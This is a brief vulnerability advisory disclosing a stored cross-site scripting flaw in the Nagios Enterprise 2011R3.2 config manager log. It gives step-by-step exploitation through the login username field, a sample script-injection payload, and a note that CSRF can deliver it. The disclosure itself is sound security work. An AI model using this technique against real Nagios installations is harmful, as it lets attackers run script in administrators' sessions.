Nagios Enterprise Config Manager Log Persistent XSS

by Adam Baldwin

Summary

A persistent (stored) cross-site scripting vulnerability exists in the Nagios Enterprise 2011R3.2 configuration manager. The username field on the Nagios Core Config Manager login page (http://nagios.example.com/nagiosql/index.php) is not properly encoded when displayed on the config manager log.

No authentication is required to inject the payload into Nagios, however an authenticated user must visit the vulnerable page. Should the nagios server not be public, injection of the payload can also be accomplished using CSRF as the login form has no CSRF validation.

Example exploitation

  • Attacker visits the login page.
  • Attacker drops payload in the username field. Example: <script>alert(1)</script>
  • Attacker fails authentication on that page
  • Victim logs into nagios and vists the config manager log in the configuration manager
  • Attackers payload is executed in the context of the config manager user

Nagios said that this would be addressed in the Nagios XI 3.3 release.